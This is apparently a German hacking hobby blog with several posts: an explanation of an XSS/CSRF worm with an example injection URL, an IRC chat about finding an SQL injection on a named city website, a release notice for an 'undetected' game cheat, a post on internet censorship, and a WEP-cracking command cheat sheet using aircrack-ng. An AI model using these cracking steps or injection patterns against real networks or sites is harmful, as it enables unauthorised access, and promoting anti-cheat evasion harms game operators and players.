In der letzten Woche konnte man auf manchen News Seiten von einem Xss Wurm lesen, der sich durch das Twitter Netzwerk schlängelte. (News)

Einige fragen sich sicherlich, wie so ein Wurm sich verbreitet und warum er gefährlich sein kann.

Wie sich ein Wurm verbreitet:

Zunächst benötigt man eine Xss Lücke auf einer Homepage, bei dem Fall Twitter war diese in dem Profil. Da man hier dauerhaft JScript Code platzieren kann, würde dieser bei jedem Aufruf des Profils ausgeführt werden (natürlich nur sofern man JScript aktiviert hat).

Die folgende Angriffsmethode nennt man CSRF, was das ist kann man gut bei Wikipedia nachlesen:

Eine Cross-Site Request Forgery (zu deutsch etwa „Site-übergreifende Aufruf-Manipulation“, meist XSRF oder CSRF abgekürzt) ist ein Angriff auf ein Computersystem, bei dem der Angreifer unberechtigt Daten in einer Webanwendung verändert.

Hierbei wird nun z.B. durch einen Aufruf, der durch den JScript Code ausgelöst wird, ein Link aufgerufen, der das eigene Profil verändert.

Dies könnte z.B. so aussehen

www.eineurl.de/index.php?mode=profile&hobbys=<Jscript Code>&senden=true

Hierbei würde JScript Code im Feld “hobbys” gespeichert werden und bei einem Aufruf des Profils ausgeführt werden.

Abwehrmaßnahmen

Abwehrmaßnahmen gegen solche Attacken, die auch zum Erfolg führen würden, wären z.B. das deaktivieren von JScript oder das benutzen eines Blockers (z.B. NoScript).

Heute hatte mich Lainux (Cheat-Forum.eu) angeschrieben, da er auf einer Seite im Login Feld einen SQL Fehler “erzeugen” konnte …

[18:41] Lainux: so , sql lücke gefunden
[18:41] -tmh-: uhhh
[18:42] Lainux: jetz kommst du ins spiel ;D
[18:42] -tmh-: zeig
[18:42] Lainux: http://stadt-bremerhaven.de/counter/stats/index.php

[20:16] Lainux: http://stadt-bremerhaven.de/counter/stats/index.php
[20:16] Lainux: fixxed

… und daraus ist dies entstanden

http://www.milw0rm.com/exploits/8461

Read the rest of this entry »

Good morning guys and girls,

here is a new release of the Kartoffel-Hack.

What’s new ?

• Radar Trace : Now you can see the way of your enemys and teammates
• Cvar Bypass : Allows cvar commands
• Show Impacts : See your bullets and your enemy if you hit him

Older versions are still undetected

Download : Kartoffel-Hack / Readme

//Edit: Blog visiting has been removed ( no opening webbrowser)

Seit Tagen wurde auf mehreren News Seiten über die “neue” Internetzensur berichtet. Und auch ich wollte ein paar Sachen dazu loswerden.

Manch einer denkt sich sicher : “Ist doch gut, dass Seiten mit Kinderpornographischen Inhalt blockiert werden”. Das ist natürlich gut und ich habe nichts dagegen, jedoch ist es meiner Meinung nach die falsche Vorgehensweise.

Wäre es nicht besser mehr dafür zu tun um die Kinder zu schützen? Wenn man mehr für den Schutz der Kinder tut wäre das Sperren nicht mehr nötig.

Eine weitere Befürchtung, die wahrscheinlich nicht nur ich habe ist das diese Zensur bald ausgeweitet werden könnte. Stellt euch mal vor, dass die Musik/Filmindustrie bald auf die Idee kommt, diese Zensur auch für sich in Anspruch nehmen zu wollen.

Dann wird es nicht lange dauern, bis die nächste Industrie/etc. auf die Idee kommt dies für sich auch zu beantragen.

Natürlich kommt es auch jetzt schon vor, dass Seiten auf Grund von falschen Tatsachen gesperrt werden. So wurde z.B. Wikileaks am vergangenen Freitag von DeNic gesperrt. (Artikel)

Wenn ihr wissen wollt ob auch euer Provider euch einen Teils des Netztes verwehrt/verwehren wird könnt ihr dies hier nachgucken :

http://www.zensurprovider.de/

Was gut hierzu passt : http://www.piratenpartei.de/

Sommer ist die Zeit im Jahr, in der es warm ist … wir haben zwar erst Frühlingsanfang aber es ist meiner Meinung nach schon wieder zu warm um in der Bude zu hocken.

Jetzt ist die Frage, was machen!? Letztes Jahr bin ich mit meinem Lappi losgezogen (Warwalking) und hatte bisschen die Umgebung gecheckt, wo und was für Wlan Verschlüsselungen in meiner Gegend genutzt werden.

Aus irgendeinem Grund haben hier viele eine Vorliebe für die WEP (Wired Equivalent Privacy) Verschlüsselung, Sicherheit wird hier anscheinend sehr klein geschrieben.

Das diese Verschlüsselung mitlerweile absolut nichts mehr bringt sollte jeden klar sein und daher hier ein paar Tipps, wie auch ihr in solch ein Wlan eindringen könnt. (Natürlich nur bei dem eigenen, alles andere wäre ja illegal)

Zunächst braucht ihr eine Wlan Karte /Stick, die von z.B. aircrack unterstützt wird. Eine Liste mit unterstützten findet ihr hier: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Nun gibt es 2 Möglichkeiten

• Ihr macht es unter Windows
• oder ihr macht es unter einer Linux Distribution

Ich hatte mich bisher immer für die 2te Variante entschieden und es (wie viele andere sicher auch) mit Backtrack 3 (ja ich weiß es gibt schon v4) gemacht. Da dies kein HowTo werden soll, eigenes Denken und probieren ist immer besser, hier mal eine kleine Liste die ich immer neben mir liegen habe .

~~~Sniffen~~~
 
Shell :
 
airmon-ng  // auflisten
airmon-ng start rausb0 // monitor Mode
 
airodump-ng rausb0 // Wlan anzeigen
airodump-ng -c [channel] -w [network.out] –bssid [bssid] rausb0 // MAC Adresse (BSSID), Channel (CH) und Name (ESSID) 
 
airodump-ng -w /root/Desktop/dump rausb0 // Pakete sammeln
Strg +c // beenden
 
-------------------------------------------------------
~~~Cracken~~~
 
Shell :
aircrack-ng -n 128 -b [bssid] [filename]-01.cap  // evt. zu 64 ändern
 
Windows:
Aircrack-ng Gui starten
 
10.000 - 20.000 Pakete

Ein “externes” Tutorial könnt ihr euch hier durchlesen : http://board.protecus.de/t34622.htm

—————————————-

PS: Vielen Dank für die hohe Visit Zahl ( im Moment > 20 000 am Tag)